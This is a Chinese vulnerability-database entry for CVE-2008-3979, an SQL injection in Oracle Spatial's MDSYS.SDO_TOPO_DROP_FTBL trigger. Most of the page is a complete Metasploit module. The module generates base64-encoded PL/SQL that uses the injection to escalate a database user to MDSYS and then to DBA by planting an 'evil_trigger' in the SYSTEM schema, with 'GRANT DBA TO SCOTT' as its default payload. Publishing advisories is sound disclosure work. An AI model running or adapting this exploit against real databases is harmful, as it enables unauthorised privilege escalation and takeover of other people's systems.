Oracle Database 组件Oracle Spatial 未明访问控制安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117410 漏洞类型
发布时间 2009-02-18 更新时间 2009-03-06
CVE编号 CVE-2008-3979 CNNVD-ID CNNVD-200901-133
漏洞平台 Multiple CVSS评分 5.5
|漏洞来源
https://www.exploit-db.com/exploits/8074
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-133
|漏洞详情
OracleDatabase是一款商业性质大型数据库系统。OracleDatabase(10.1.0.5,10.2.0.2)组件OracleSpatial存在未明访问控制安全漏洞。远程认证用户可以通过未明向量影响系统的机密性、完整性和可用性。注意:Oracle声明在执行MDSYS.SDO_TOPO_DROP_FTBL触发时没有正确地过滤某些输入,远程认证用户可以执行SQL注入攻击。成功攻击要求拥有CREATESESSION权限。
|漏洞EXP
##
# $Id: droptable_trigger.rb
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'


class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::FILEFORMAT

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SQL Injection in  MDSYS.SDO_TOPO_DROP_FTBL Trigger.',
			'Description'    => %q{
					This module will escalate a Oracle DB user to MDSYS by exploiting an sql injection bug in
					the MDSYS.SDO_TOPO_DROP_FTBL trigger. After that exploit escalate user to DBA using "CREATE ANY TRIGGER" privilege
					given to MDSYS user by creating evil trigger in system scheme (2-stage attack).
			},
			'Author'         => [ 'Sh2kerr <research[ad]dsec.ru>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision:$',
			'References'     =>
				[
					[ 'CVE', '2008-3979' ],
					[ 'URL', 'http://www.securityfocus.com/archive/1/500061' ],
					[ 'URL', 'http://www.ngssoftware.com/' ],
				],
			'DisclosureDate' => 'Jan 13 2009'))

			register_options( 
				[
					OptString.new('SQL',      [ false, 'The SQL to execute.',  'GRANT DBA TO SCOTT']),
					OptString.new('USER',      [ false, 'The current user. ',  'SCOTT']),
					OptString.new('FILENAME', [ false, 'The file name.',  'msf.sql']),
					OptString.new('OUTPUTPATH', [ false, 'The location of the file.',  './data/exploits/']),
				
				], self.class)
	end

	def run
		name1  = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
		name2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
		rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
		rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
		rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
		rand4 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
		rand5 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

		function1 = %Q|
			CREATE OR REPLACE PROCEDURE #{name1}
			AUTHID CURRENT_USER AS
			PRAGMA AUTONOMOUS_TRANSACTION; 
			BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}'; 
			END;
			|


		function2 = %Q|
			CREATE OR REPLACE FUNCTION #{name2} RETURN number AUTHID CURRENT_USER is
			PRAGMA AUTONOMOUS_TRANSACTION;
			STMT VARCHAR2(400):= 'create or replace trigger system.evil_trigger before insert on system.DEF$_TEMP$LOB DECLARE msg VARCHAR2(10);
			BEGIN #{datastore['USER']}.#{name1};
			end evil_trigger;';
			BEGIN
			EXECUTE IMMEDIATE STMT;
			COMMIT;
			RETURN 1;
			END;
			|

		prepare ="create table \"O' and 1=#{datastore['USER']}.#{name2}--\"(id number)"
		
		exploiting1 ="drop table \"O' and 1=#{datastore['USER']}.#{name2}--\""
		
		exploiting2 = "insert into system.DEF$_TEMP$LOB (TEMP$BLOB) VALUES ('AA')"
		
		fun1  = Rex::Text.encode_base64(function1)
		fun2 = Rex::Text.encode_base64(function2)
		prp  = Rex::Text.encode_base64(prepare)
		exp1 = Rex::Text.encode_base64(exploiting1)
		exp2 = Rex::Text.encode_base64(exploiting2)
		

		sql = %Q|
			DECLARE
			#{rand1} VARCHAR2(32767);
			#{rand2} VARCHAR2(32767);
			#{rand3} VARCHAR2(32767);
			#{rand4} VARCHAR2(32767);
			#{rand5} VARCHAR2(32767);
			BEGIN
			#{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{fun1}')));
			EXECUTE IMMEDIATE #{rand1};
			EXECUTE IMMEDIATE 'GRANT EXECUTE ON #{name1} TO PUBLIC';
			#{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{fun2}')));
			EXECUTE IMMEDIATE #{rand2};
			EXECUTE IMMEDIATE 'GRANT EXECUTE ON #{name2} TO PUBLIC';
			#{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}')));
			EXECUTE IMMEDIATE #{rand3};
			#{rand4} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp1}')));
			EXECUTE IMMEDIATE #{rand4};
			#{rand5} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp2}')));
			EXECUTE IMMEDIATE #{rand5};
			END;
			/
			DROP FUNCTION #{name1};
			DROP FUNCTION #{name2};
			|


		print_status("Creating '#{datastore['FILENAME']}' file ...")		
		file_create(sql)


	end

end 

# milw0rm.com [2009-02-18]
|参考资料

来源:www.oracle.com
链接:http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
来源:SECTRACK
名称:1021561
链接:http://www.securitytracker.com/id?1021561
来源:BID
名称:33177
链接:http://www.securityfocus.com/bid/33177
来源:BUGTRAQ
名称:20090113TriggerAbuseofMDSYS.SDO_TOPO_DROP_FTBLinOracle10gR1andR2
链接:http://www.securityfocus.com/archive/1/archive/1/500061/100/0/threaded
来源:MILW0RM
名称:8074
链接:http://www.milw0rm.com/exploits/8074
来源:VUPEN
名称:ADV-2009-0115
链接:http://www.frsirt.com/english/advisories/2009/0115
来源:SECUNIA
名称:33525
链接:http://secunia.com/advisories/33525
来源:OSVDB
名称:51354
链接:http://osvdb.org/51354